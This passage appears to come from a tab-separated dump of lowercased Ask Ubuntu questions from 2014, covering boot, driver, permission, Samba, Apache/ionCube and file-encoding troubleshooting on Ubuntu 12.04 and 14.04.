limit . please do so manually by writing a higher value into /proc/sys/fs/inotify/max_user_watches . well , sorry for such a long preamble , now i want all us three me/she/kids to be able to drop files/make dirs/move/del files/dirs into /srv/minidlna/movies|music|pictures easily ( and as a bonus prevent deletion of any of the 4 parents ) , without always have to ask me to do this for obscure permissions restrictions . in the past precise , the folder was owned by root , group was minidlna and i added us three as members in the group . maybe chmod was too restrictive , i ca n't remember , just remember it was boring . maybe i puzzled/confused myself with primary/secondary groups as i still ca n't understand how they are imbricated or linked into each other , so that she or kids can move/delete files/folders i dropped/created there in the whole 3 subtrees . maybe also i was too nasty with removing -r any rwx to others ? please what is the good way if any ? we are every where advised not to play with umask ( whose man is too cryptic to me , whatever ) . thank you so much for reading such a long question , but as it is a security factual example , i believe an answer could be a good training to make me and others , i hope , a little more aware and easy in this matter of privileges .
503051	mycraft - info to download ?	i installed ubuntu 14.04 on my sons computer , then through ubuntu software center purchased mycraft . i received an email confirmation of the purchase , but no product key or download information . how do i get and install this ?
503055	nautilus right-click menu app icons	i 'm running ubuntu 14.04 with gnome 3.10 . i have a simple and flat gtk theme and to complement this ui idea , i 'd like to remove application icons from my right-click menu in nautilus . in my theme 's settings.ini i have `` gtk-menu-images '' set to 0 and i do n't have icons for any other option in the right-click menu - but they persist for apps . how can i remove them ?
503056	nm-applet disappeared from top panel ubuntu 12.04	i know there are many similar questions . none of those solutions have worked for me . if i try running nm-applet in terminal , this is the output i get ... ** message : applet now removed from the notification area ** message : using fallback from indicator to gtkstatusicon thank you for your help .
503059	help recovering from a hack and a malware warning	on thursday ( 2014/7/24 ) morning i discovered that one of my ubuntu systems was hacked . i believe it may have been the malware netwire . i was able to see some traffic from the internet directed at the domain port ( 53 ) . based on the traffic seen it looks like the entry was via port 53 . i had just installed ubuntu , including arano 's firewall , but not the namserver . i booted a knoppix live dvd to try to recover but the system was seriously compromised . the observable effects were : the former boot drive , /dev/sda , was now showing up in gparted as /dev/sdf but in the display of the disk partitions were named /dev/sda ? none of those partitions were accessible . further investigation showed that the permissions on each of the sda ? partitions were listed as `` sticky , block special '' . in an `` ls -l '' of the partitions shown permissions `` brw-rw -- -t '' . i went looking unsuccessfully for web sites with suggestions for dealing with this problem . so attempting to gain access to the former /dev/sda partition i did a chmod ( 1 ) to 'unstick ' the sda ? partitions . then i tried renaming /dev/sdf to /dev/sda . the effect of this on the gparted ( 8 ) partition display was that all partitions were no longer displayed . in their place was an unallocated partition and no file system , size 2.2 gb , named /dev/zram0 whaterver that is . it looks like the era of relative freedom of linux systems from malware is over . google netwire and datascrambler . netwire is the malware and datascrambler hides the malware from anti-virus programs . netwire cab attack windows , macs and linux systems according to the information i have seen .
503060	installer crashing	i have an old hp a1430n and i 'm trying to install ubuntu . it gets through until the screen where i enter a username and password , but it crashes . tried several times and it crashes there every time . i do get about 4 lines of this message after : drm crtc helper set config error failed to set mode on crtc:10 . all i could come up with in searching was something about the nvidia chipset driver and i tried updating them , but still crashes . any ideas or suggestions on what to do ? also , is it possible to install ubuntu to a hard drive in one computer , then move said hard drive to another computer ? if so , would that help the situation ? edit : trying to install 14.04 .
503063	how do i get grub to load properly from a usb external hard drive ?	i 've created a bootable backup of my ubuntu to an external usb hard drive . i can now boot to my external backup from grub when grub is loaded from my internal hard drive , but i can not boot to grub on the external hard drive . after telling my pc bios to boot from usb , i just get the message `` reboot and select proper boot device '' . the external usb hard drive is a `` wd my passport ultra 1tb drive '' . here 's the steps i 've taken to get this far : deleted and recreated the msdos partition table on the external drive . created partitions as follows.. model : wd my passport 0820 ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 483gb 483gb primary ext3 boot 2 483gb 698gb 215gb primary fat32 3 698gb 1000gb 302gb primary ntfs which results in this : disk /dev/sdb : 1000.2 gb , 1000170586112 bytes 255 heads , 63 sectors/track , 121597 cylinders , total 1953458176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00019d8c device boot start end blocks id system /dev/sdb1 * 2048 943720447 471859200 83 linux /dev/sdb2 943720448 1363150847 209715200 b w95 fat32 /dev/sdb3 1363150848 1953458175 295153664 7 hpfs/ntfs/exfat the second and third partitions are for other , non-linux , backups . used rsync to copy my entire ubuntu , from the root on down , to the external drive on /dev/hdb1 ( my ubuntu backup partition ) , largely using this as my guide : https : //wiki.archlinux.org/index.php/full_system_backup_with_rsync modified the backup 's /etc/fstab ( i.e . /media/linuxbackup/etc/fstab where /media/linuxbackup is the mount point for /dev/sdb1 ) to have just two entries : proc /proc proc defaults 0 0 uuid=ba0ad23c-1625-4dbf-ae50-0e4e68f469a6 / ext3 relatime , errors=remount-ro 0 1 where the above uuid is the uuid of /dev/sdb1 . in the internal drive 's ubuntu partition ( /dev/hda7 ) , i modified /boot/grub/menu.lst to include the following entry : title usb boot , ubuntu 12.04.4 lts , kernel 3.2.0-67-generic uuid ba0ad23c-1625-4dbf-ae50-0e4e68f469a6 kernel /boot/vmlinuz-3.2.0-67-generic root=uuid=ba0ad23c-1625-4dbf-ae50-0e4e68f469a6 ro quiet splash initrd /boot/initrd.img-3.2.0-67-generic quiet i rebooted and selected the above entry and successfully booted into unbuntu off of the external hard drive . i confirmed this by checking that /dev/sdb1 is mounted as / ( rather than /dev/sda7 , as it is when booting from the internal drive ) . i attempted to load grub into the master boot record ( mbr ) of the external hard drive by running : # sudo grub-install /dev/sdb this ran successfully . i rebooted , changed my pc bios to boot only from usb , expecting grub to appear , but instead got `` reboot and select proper boot device '' , making it seem as though grub is not on the external drive . i 'm now at a bit of a loss . could this be a problem with my motherboard 's bios or with my passport ultra ?
503064	deleted ubuntu , ca n't boot anything	the ubuntu ( 14.04 ) partition was deleted , and now i ca n't boot windows . ( it was dual booting 8.1 ) i 've tried everything . i ca n't boot through cd , or the hdd hard drive . i 've reset the bios settings , set cd-rom too boot first , and the hdd to boot second . i do n't have the windows install disk , but i do have the ubuntu cd . but when attempting to boot to cd , i am either stuck with a `` boot from cd/dvd : '' message , without being prompted to press a button , or i am given a grub error message `` error : no such partition . '' then it gives me the grub rescue mode prompt . i 've read about a dozen forum threads , and none have helped .
503068	amd drivers install	i recently installed ubuntu 14.04.1 on laptop hp g62-b10sv.i tried to install the ati drivers from additional drivers ( fglrx ) but it crashes at startup screen so i reinstall ubuntu.any idea of what drivers to install ? my graphic card is ati mobility radeon hd 5470 graphics ( switchable ) .thanks my gpus mobility radeon hd 4225/4250 and mobility radeon hd 5430/5450/5470 . this is the results of lspci | grep vga
503074	sync ipad music	i know that in older versions of ios , users were able to sync their idevice with ubuntu . as i 'm writing this now , the latest version of ios is 7.1.2 , and most of the users are using it ( and we 're waiting ios 8 release ) , and i 'm trying to find a way to sync my ipad 's music catalog in ubuntu . this is my current situation : i have kubuntu 14.04 i have an ipad mini with ios 7.1.2 i have libimobiledevice version 1.1.5+git20140313.bafe6a9e-0ubuntu1 when i connect my ipad to my computer , they recognize each other , and i can see photos on my device like a usual folder in dolphin ( kde file browser ) . and clearly , i do n't want to directly or inderictly use windows or mac osx . i want to do it in linux . but i have no luck making amarok ( kde music player ) recognize the device , or do any other thing with the device . is there any way to do this ?
503076	i have an error in ubuntu 14.04	emm ... i 'm mexican , my english is n't good , but i need help , the problem is : i ca n't see my apps , when i try it , i see this : another thing : when i try to use sudo apt-get update or sudo apt-get upgrade the console closes . i do n't know if this problem is related . this problem appeared 3 or 2 days ago , i installed ubuntu 14.04 a ... one week ago maybe
503077	does not work on lenova g400 laptop	i installed ubundu from cd after instalation ( did not installed drivers ) i reboot the system the got an error message on screen'your system graphics is law ' my system have intel i5 , amd 2gb dedicated graphics how can i solve this problem ?
503081	how to install aptitude ?	i 've tried to install aptitude on a clean install of ubuntu server 14.04 ( on docker ) and i get : step 2 : run apt-get install aptitude -- - > running in 257ad5947629 reading package lists ... building dependency tree ... reading state information ... the following extra packages will be installed : apt-xapian-index aptitude-common iso-codes libboost-iostreams1.54.0 libclass-accessor-perl libcwidget3 libept1.4.12 libio-string-perl libparse-debianchangelog-perl libpython-stdlib libpython2.7-minimal libpython2.7-stdlib libsigc++-2.0-0c2a libsub-name-perl libtimedate-perl libxapian22 python python-apt python-apt-common python-chardet python-debian python-minimal python-six python-xapian python2.7 python2.7-minimal xz-utils suggested packages : app-install-data python-xdg aptitude-doc-en aptitude-doc tasksel debtags isoquery libcwidget-dev libhtml-parser-perl libhtml-template-perl libxml-simple-perl xapian-tools python-doc python-tk python-apt-dbg python-gtk2 python-vte python-apt-doc xapian-doc python2.7-doc binutils binfmt-support the following new packages will be installed : apt-xapian-index aptitude aptitude-common iso-codes libboost-iostreams1.54.0 libclass-accessor-perl libcwidget3 libept1.4.12 libio-string-perl libparse-debianchangelog-perl libpython-stdlib libpython2.7-minimal libpython2.7-stdlib libsigc++-2.0-0c2a libsub-name-perl libtimedate-perl libxapian22 python python-apt python-apt-common python-chardet python-debian python-minimal python-six python-xapian python2.7 python2.7-minimal xz-utils 0 upgraded , 28 newly installed , 0 to remove and 5 not upgraded . need to get 9754 kb of archives . after this operation , 49.3 mb of additional disk space will be used . do you want to continue ? [ y/n ] abort . 2014/07/26 19:22:30 the command [ /bin/sh -c apt-get install aptitude ] returned a non-zero code : 1 i 've done : apt-get update apt-get install aptitude . ca n't do apt-get upgrade because throws another error . so nervous that this does n't work ... sorry about this .
503090	ubuntu not shown as boot option when installed with windows 8	my laptop came pre installed with windows 7 and currently has windows 8.1 after upgradation . i installed ubuntu on it from a usb drive by selecting a partition ( not the side by side windows option ) . installation completed successfully . but it does not give an option to boot to linux . it boots directly to windows . i tried boot repair . but still the issue persists . some forums suggested the issue may be due to secure boot but it is not there in my laptop . what could be the issue ? how can i solve this ? if nothing else works , is there any way by which i can uninstall the ubuntu and try re installing it from scratch ? the boot-repair details are at http : //paste.ubuntu.com/7868025/
503091	can an adnroid device connect to an ubuntu if and only if it has a sd card in it ?	i tried many way like -installing mtp tools on my ubuntu 14.04 -checking and seeing only one thing about debugging is abled android icecream -tried the steps : http : //www.androidcentral.com/ics-feature-mtp-what-it-why-use-it-and-how-set-it but still there is no action on ubuntu 14.04
503092	mass convert files to utf-8 without renaming , and not converting any `` wrong '' encodings by mistake	ok , so this is a headache and i have found no solutions to this problem at all . i have a buch of files ( over 50 000 ) , and i would like to convert them to utf-8 without renaming them to .utf8 or something like that . just overwrite the originally file . 99 % of them are iso-8859-1 , but i 'm not certain everything is . most methods i 've found takes a definite parameter as the input encoding ( like iconv ) . other methods that can auto-detect ( like enca ) does n't support iso-8859-1 . handling the iso-8859-1 files and skip the rest is fine . converting them as well is also fine . why iconv does n't work is that i do n't want it to convert from iso-8859-1 if one file should happen to be in another encoding and therefore `` screw up '' the file . and it has to work recursively since it 's 50 000 files in a lot of directories . it 's really a headache . i thought this was an easy problem . after all , if i open up a file in geany , it immediately recognizes the encoding , and regardless , i can set it to utf-8 , save it , and i 'm fine . but i ca n't do that manually for 50 000 files . suggestions or tips are most welcome . thanks for reading .
503093	ca n't format an usb drive	i receive following error in disk-utility : error synchronizing after initial wipe : timed out waiting for object ( udisks-error-quark , 0 )
503095	ubuntu 12.04 not prompting me to 14.04.1	i have ubuntu 12.04 . i know that 14.04.1 has been released and i can update from the freakin update mananger . but it aint showing me the prompt to upgrade . only shows me that new hardware support is abvilebale . can anybody say whats the problem . ps : its been over 48 hours since release
503105	how to shutdown an ubuntu vm for 5 mins and then restart after 5 min automatically	i would like to shutdown a vm which is running ubuntu 12.04lts , and it should come up after 5 mins . can this be done using command line ?
503112	why i ca n't change my screen resolution ?	i am using elementary os luna which is based on ubuntu 12.04 lts . after installing system i ca n't change my resolution from 640x480 to 1024x768 . here are the details of the graphics card :
503114	trying to save work off low disk space	i 'm a complete noob with ubuntu and i 've been trying to learn since i recently transitioned from windows . i made a stupid mistake by trying to install the upgrade when i had low disk space . i now get an low resultion error and i believe it is because of the low disk space . i have a usb hard drive that i would like to transfer some of my work over which will free up a few gigs of space . i only have the terminal to work with so if i can have some help to figure out how to locate my files using the terminal and then transfer them over to the usb hard drive i 'd really appreciate it . i 've tired it on my own and had no luck , like i said , i 'm a complete noob and the terminal can be intimidating for a gui user like myself .
503115	how to open jar file with doubleclick after upgarade to 14.04 ?	after upgrading to 14.04 . i ran into problems with opening .jar files . double clicking on client.jar does n't open it . i tried right clicking and selecting both , openjdk java 7 runtime and openjdk java 6 runtime with no success . program runs fine from eclipse and i can run it from terminal using java -jar client.jar , but it 's somewhat inconvenient . how can i make it run by double-clicking the .jar file ? p.s . double clicking on .jar worked fine on 12.04 .
503116	juju add a unit to a pending agent	i do have a service with a unit pending because theres no machines to add that unit . after i add a machine , how to assign the pending unit to that machine ? i 've searched under google and in the official documentations , but with no success .
503119	trouble installing ubuntu 14.04	i downloaded ubuntu 14.04 lts from ubuntu.com as an iso-file . then i transferred this iso-file to an 8 gb usb stick using usb-create-kde application . but when i try to boot up using this iso-file i do not get the usual choices of language and a choice of running it standalone or installing it . the installer program runs for a while showing me the `` ubuntu '' logo and then i get the ubuntu desktop with icons for screen , network , language / keyboard and power management ( suspend , hibernate , restart , shutdown ) on the upper right corner . it 's not possible to do anything on this desktop except using the functions of the icons mentioned above . the same happend when i tried to burn the same iso-file on a dvd/cd and boot from it . but : when i tried the same with an iso-file for ubuntu 12.04 lts it all worked as it should , giving me the choice of installation language and so on . have i done anything wrong , or is there another solution to this strange behavior ?
503122	can i route spotify ( or other application ) through my connection while connected to vpn ?	i am connected to a client 's vpn in order to test an application i am working on . it has a fairly slow upload speed about ~4mbps . i have a 75mbps down and would like to use spotify with my local lan and everything else can run on the vpn . i googled around , and most answers are about using the hardware router , i 'm wondering if i can do this in ubuntu since i 'm using the default connection manager to connect to the vpn .
503124	14.04 does not boot after otherwise successful dual boot with windows 8.1	have asus x551m notebook pc . boots windows 8.1 want to dual boot ubuntu . need clarification on bios setup . what does `` bios '' add boot option really want when it says it wants a format of fs0 : \path\filename.efi ? hd0 , gpt7 does n't look like the right format but neither does `` windows boot manager ( p0 : hgst hts545050a7e680 ) '' which is option 1 and the only option . nor does it look like or `` p1 : tsstcorp cddvdw sn-208fb '' which is available for the dvd if i enable csm ( compatibility support mode ) to boot from the ubuntu live dvd . it is difficult to formulate a simple question when i do n't know what i need to know to fix the problem . i could not find a better description of `` bios '' settings from either asus or american megatrends . aptio setup utility version 2.15.1236 ( c ) 2013 bios version 504 i have tried to describe what i have done . grub2 should be able to chainload to windows if i could get to it . i can not read/see hd0 , gpt6 so do n't know if a *.efi file exists there . how does bios settings boot override work ? it claims to search for a shell.efi from the file system but does n't find one . any pointers to other sources will be appreciated . thanks for your consideration . trying to dual boot 64 bit pre-installed windows 8.1 with ubuntu 14.04 intel x86 for the celeron n2830 64 bit cpu in my asus x551m notebook pc . install went well but pc boots only to windows . from : http : //releases.ubuntu.com/14.04/ , guided by the following text : { `` there are two images available , each for a different type of computer : pc ( intel x86 ) desktop image for almost all pcs . this includes most machines with intel/amd/etc type processors and almost all computers that run microsoft windows , as well as newer apple macintosh systems based on intel processors . choose this if you are at all unsure . 64-bit pc ( amd64 ) desktop image choose this to take full advantage of computers based on the amd64 or em64t architecture ( e.g. , athlon64 , opteron , em64t xeon , core 2 ) . if you have a non-64-bit processor made by amd , or if you need full support for 32-bit code , use the intel x86 images instead . '' } i chose intel x86 for the celeron n2830 64 bit cpu in my asus x551m notebook pc , downloaded the .iso file and burned a live dvd . changed `` bios '' settings to enable csm ( compatibility support mode ) and disable secure boot in order to boot from the dvd and try ubuntu worked fine . when i started an install , there was no option to install alongside windows 8.1 . i backed out , rebooted to 8.1 and made a usb recovery drive . the next install from the ubuntu live dvd gave me the option to install ubuntu alongside 8.1 which i chose . the install offered to split the available disk space 50/50 or use a gui to change it to something else which i did . the install proceeded as expected from my experience with ubuntu12.04 and completed grub-install then asked for a reboot . there was no grub menu and the reboot proceeded to windows . post install , gparted reports the following : partition filesystem mount point label size used unused flags /dev/sda1 fat32 system 100mib 29.46mib70.54mib boot /dev/sda2 ntfs recovery900mib 287mib 612mib hidden , diag /dev/sda3 ! unknown 128mib -- - -- - msftres /dev/sda4 ntfs os 304gib 29.0gib 275gib msftdata /dev/sda6 ! unknown 1.00mib -- - -- - bios_grub /dev/sda7 ext4 media/ubuntu/uuid 136gib 5.48gib 131gib /dev/sda8 linux-swap 3.89gib 4kib 3.89gib /dev/sda5 ntfs restore 20gib 8.76gib 11.25gib hidden , diag note : uuid for /dev/sda7 above is for the partition /dev/sda1 is efi system partition ( esp ) . `` bios '' add boot option says it wants a format of fs0 : \path\filename.efi . do i need to add a boot option of the form p0 : \part7 ? how would i specify partition7 in windoweze ? boot override in `` save changes and exit '' lists windows boot manager ( p0 : hgst hts545050a7e680 ) this is the internal hard drive p1 : tsstcorp cddvdw sn-208fb this is the internal dvd uefi : crucial gizmo ! 1100 this is the windows 8.1 16gb recovery thumb drive crucial gizmo ! 1100 this is an 8 gb thumb drive i was using to save data from the live ubuntu o/s from grub.cfg in gpt7 viewed by ubuntu live from the dvd , the following lines : if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt7 -- hint-efi=hd0 , gpt7 -- hint-baremetal=ahci0 , gpt7 my-uuid as listed by gparted above else search -- no-floppy -- fs-uuid -- set=root my-uuid as listed by gparted above fi seem to indicate that grub is prepared to boot ubuntu by efi if given the opportunity . i suspect that gpt6 holds a clue with flag bios_grub . this may be the starting point for grub but i do n't know how to point the `` bios '' to this location . most other problems i read ca n't get into windows . i can get into ubuntu only from the live dvd and if i enable csm . i have tried with both csm enabled and disabled but do n't get to grub . new : the following terminal results of the installed ubuntu system from the live dvd indicate that there is no sys/firmware/efi and no boot/efi which might indicate a non efi installation . however , the image on disk is not a running ubuntu system so perhaps their lack is explained by these files being created at boot time . is it possible to chroot into gpt7 from the live dvd and should i expect that to help ? i notice some of the suggested diagnostics are linux commands but believe they provide answers only to the running system . ubuntu @ ubuntu : ~ $ ls /media/ubuntu/ '' uuid-of-/dev/sda7 '' /boot abi-3.13.0-24-generic initrd.img-3.13.0-24-generic memtest86+_multiboot.bin config-3.13.0-24-generic memtest86+.bin system.map-3.13.0-24-generic grub memtest86+.elf vmlinuz-3.13.0-24-generic ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ ls /media/ubuntu/ '' uuid-of-/dev/sda7 '' /boot/grub fonts gfxblacklist.txt grub.cfg grubenv i386-pc locale ubuntu @ ubuntu : ~ $ ls /media/ubuntu/ '' uuid-of-/dev/sda7 '' /sys ubuntu @ ubuntu : ~ $ ls /media/ubuntu/ '' uuid-of-/dev/sda7 '' /mnt ubuntu @ ubuntu : ~ $ ls /media/ubuntu/ '' uuid-of-/dev/sda7 '' /media
503126	how to uninstall ubuntu grub after formatting ubuntu partition in windows 8 ?	so i tried uninstalling ubuntu from my dual-boot of windows 8 and ubuntu ( grub booted everything ) i formatted the partition for ubuntu from windows i tried booting into windows afterwards and couldn't i 'm simply faced with a grub commandline i tried going into recovery then to command prompt i tried bootrec /fixmbr bootrec /fixboot and none of them worked . i am still booted into the grub command line , is there anyway to fix this and boot back into windows ?
503127	should i save my scripts with the .sh extension ?	i have some functional scripts and i want to copy to /usr/bin i want to use them as normal terminal commands . is it a good practice to use them with the .sh extension or can i save them without extension ?
503128	ca n't connect to wifi14.04	i recently moved back home , and for some reason my laptop ca n't connect to my wifi.it used to connect to it after some time , but now it just stopped . i have an asus q501la . any help would be much appreciated edit : also the only way to connect to the internet is via ethernet connection
503131	how to install or activate the amd graphics card ?	i have a hp e026ax laptop with a discrete and an intergrated amd graphics . after install the latest 14.6 beta driver , i am only able to get amd radeon hd 7660g working . another tab is grayed out which has amd radeon hd 8600m . how to enable both cards ? enabled card 7600g disabled card 8600m
503135	samba share from ubuntu vm fails with 'force user '	i 'm a bit of a noob with ubuntu , please be patient ; ) i have two ubuntu vm 's ( server running in virtualbox , as development machines ) . the older box ( ubuntu 12.04 lts ) is running samba just fine and all shares work well . when making a new machine , i copied the share information ( but not the whole config file ) , to a new box ( ubuntu 14.04 lts ) , but many of the shares are n't working . this share is working on old and new : [ username ] path = /home/username available = yes valid users = username read only = no browseable = yes public = yes writable = yes force user = username force group = username create mask = 0644 directory mask = 0755 hide dot files = no follow symlinks = no this share fails on the newer ubuntu 14.04 lts ( it 's the same as above , but different 'force user/group ' : [ etc ] path = /etc available = yes valid users = username read only = no browseable = yes public = yes writable = yes force user = root force group = root create mask = 0644 directory mask = 0755 hide dot files = no follow symlinks = no i have other shares that i 'force user = www-data ' in a similar manner that also fail . what i see ( from osx ) when i try to connect is : '' the operation can’t be completed because the original item for “etc” can’t be found . '' ( i have no windows boxes to test with ) . ps : the smb.conf is basically 'vanilla ' otherwise : i have made no edits outside the shares themselves . i have had a quick look at the logs , and the only thing that seems to get logged is in log.workstation : [ 2014/07/27 09:02:06.173271 , 0 ] ../source3/param/loadparm.c:4094 ( check_usershare_stat ) check_usershare_stat : file /var/lib/samba/usershares/ owned by uid 0 is not a regular file any help in working out where to start solving this would be appreciated . obviously , it has something to do with the 'force user ' and 'force group ' ... but apart from that i do n't know where to look .
503140	is there a good folder icon for `` programming '' i can use in ubuntu ?	if you install ubuntu , you have unique folder icons for documents , music , desktop , downloads , etc etc . when i install ubuntu , the first thing i do is to create an additional folder called `` programming '' , where i keep my project sources . is there a folder icon available for that ?
503141	unable to use encrypted hdd on my ubuntu 14.04 lts laptop	i 've installed ubuntu 14.04 lts on an intel 64bit system . i have a western digital external hdd that i use to transfer data from a windows laptop to my ubuntu laptop with no problems . due to safety concerns about loosing my disks , i 've encrypted my hdd in windows and now i ca n't see them in my file manager when plugged to my ubuntu laptop . if i go to the disk utility i see the drive a s whole partition and can turn it off , but do n't have much more actions to do . i 'll appreciate some advice since i 'm an amateur ubuntu user .
503143	espson lx 310 installation	how does one get an espon lx310 to work with ubuntu 14.04 ? already tried using generic drivers for dot matrix in linux .
503144	problem with apache - not starting ?	i was trying to install ion cube , i was looking at an instruction online , and just copying and pasting commands to putty i realized that i was trying to install a 32 bit version on my 64 bit machine , after getting a error message . the web page that i used for instructions : so i deleted every file from the 32 bit install and then started to install the 64 bit version . i had finished all the steps but now when i needed to restart apache ( sudo service apache2 restart ) its giving me the following error : the apache2 instance did not start within 20 seconds . please read the log files to discover problems the log file : log file ! [ sat jul 26 14:31:16.494256 2014 ] [ : error ] [ pid 8725 ] [ client 91.188.124.225:45757 ] script '/var/www/httptest.php ' not found or unable to stat [ sat jul 26 14:31:16.494479 2014 ] [ : error ] [ pid 32220 ] [ client 91.188.124.225:33664 ] script '/var/www/httptest.php ' not found or unable to stat [ sat jul 26 16:03:39.391579 2014 ] [ mpm_prefork : notice ] [ pid 15284 ] ah00169 : caught sigterm , shutting down [ sat jul 26 16:03:40.473381 2014 ] [ mpm_prefork : notice ] [ pid 14582 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4.3 configured -- resuming normal operations [ sat jul 26 16:03:40.473436 2014 ] [ core : notice ] [ pid 14582 ] ah00094 : command line : '/usr/sbin/apache2' failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory [ sat jul 26 16:31:41.212169 2014 ] [ mpm_prefork : notice ] [ pid 14582 ] ah00169 : caught sigterm , shutting down failed loading /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : /usr/lib/php5/20090626+lfs/ioncube_loader_lin_5.3.so : can not open shared object file : no such file or directory php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0
503146	toshiba satellite l755 nvidia resolution + boot problem	i do n't have alot of experience in linux , i tried all the solution i could find before asking this , here it goes : i recently got a new toshiba laptop , today i installed ubuntu 14.04lts alongside of windows 7 , and it completed successfully , then i encoutered the following : 1- the resolution was low ( 640x480 ) , could n't change it from settings- > display , it 's the only option . 2- i installed the nvidia driver by running sudo apt-get install nvidia-current , then rebooted , grub menu appear , then just a blank screen appear and it hang on it . 3- went into root shell and uninstalled it by running apt-get remove nvidia-current , uninstalled ok , restarted , encountered the same problem , only a login in command-line appear and when i try to login it goes to a blank screen again . 4- again went into root shell and ran dpkg-reconfigure xserver-xorg . just excuted the command and nothing appeared , still have the same problem . 5- reinstalled ubuntu using livestick , went back to low resolution , opened settings- > software & updates- > additional drivers and i found out that it 's using xserver-xorg-video-nouveau which only have low resolution . 6- installed the nvidia-331 binary , rebooted , had the same blank screen . which driver should i install ?
503148	vga driver not working	i 've got a acer aspire e1-572g with a amd radeon r7m265 but my vga drivers are not detected please help . tell me a way to install at least windows drivers . for more about my computer visit [ 1 ] : http : //www.acer.co.in/ac/en/in/content/model/nx.m8jsi.002
503152	external hdd not recognized	i just installed 14.04 on a new computer , and attached my old sata 500gb hdd via usb external enclosure , but it is n't recognized . i ca n't seem to find it anywhere . even gparted does n't see the external hdd . is there a specific procedure i need to mount the usb hdd ? it contains all my previous data that i want to migrate to the new computer . the output of lsusb is below . steven @ steven-system-product-name : ~ $ lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 03f0:8e11 hewlett-packard bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c018 logitech , inc. optical wheel mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
503156	help creating/adding new display resolution	recently , i installed ubuntu 14.04 on my 2011 macbook pro running parallels ( for the vm ) . however , when it installed , the only resolution available is 800x600 . i would like to set the display to run on 1440x900 but using the xrandr command like this : xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync returns this : xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19
503157	how do i install graphics drivers for nvidia gt 555m series on a lenovo ideapad ( y570 ) ?	i have a lenovo ideapad y570 and it has a 1 gb nvidia gt 555m graphics card ( ubuntu 14.04 ) . all i want to do is to run cudahashcat ( 64 bit one ) on it . when i ran it initially i got a message like error while loading shared libraries : libnvidia-ml.so.1 : can not open shared object file : no such file or directory . i thought i do n't have nvidia drivers and that i should install them and then started my problems . i initially went to official nvidia site to download drivers for my laptop and when i installed and rebooted it , my screen resolution became aweful not to mention that unity was n't loading up . then i removed my /etc/modprobe.d/nvidia-installer-disable-nouveau.conf file because that 's what the installer said to do in case the installation fails . my resolution problem was solved but unity still did n't boot . moreover , i was now getting the `` low-graphics-mode error '' so i tried every single solution at this question and it did n't help . so i went to did a sudo apt-get purge nvidia* according to instruction on this answer and rebooted . viola ! my unity was loading properly . ok. my resolution and unity problem was fixed but i my original goal ( to run cudahashcat ) was n't . so now i followed the instructions from the same answer and did sudo add-apt-repository ppa : xorg-edgers/ppa . since the graphice card in my lenovo y570 series ins nvidia gt555m series i did sudo 